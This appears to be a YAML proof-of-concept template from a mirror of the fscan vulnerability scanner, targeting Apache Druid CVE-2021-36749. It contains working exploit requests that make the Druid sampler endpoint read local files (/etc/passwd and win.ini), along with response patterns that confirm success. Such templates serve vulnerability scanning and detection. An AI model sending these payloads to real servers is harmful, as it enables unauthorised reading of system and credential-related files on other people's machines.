mirror of https://github.com/qwqdanchun/fscan.git
25 lines
1.0 KiB
YAML
25 lines
1.0 KiB
YAML
name: poc-yaml-apache-druid-cve-2021-36749
|
|
manual: true
|
|
transport: http
|
|
groups:
|
|
druid1:
|
|
- method: POST
|
|
path: /druid/indexer/v1/sampler?for=connect
|
|
headers:
|
|
Content-Type: application/json;charset=utf-8
|
|
body: |
|
|
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
|
|
expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
|
|
druid2:
|
|
- method: POST
|
|
path: /druid/indexer/v1/sampler?for=connect
|
|
headers:
|
|
Content-Type: application/json;charset=utf-8
|
|
body: |
|
|
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
|
|
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
|
|
detail:
|
|
author: iak3ec(https://github.com/nu0l)
|
|
links:
|
|
- https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
|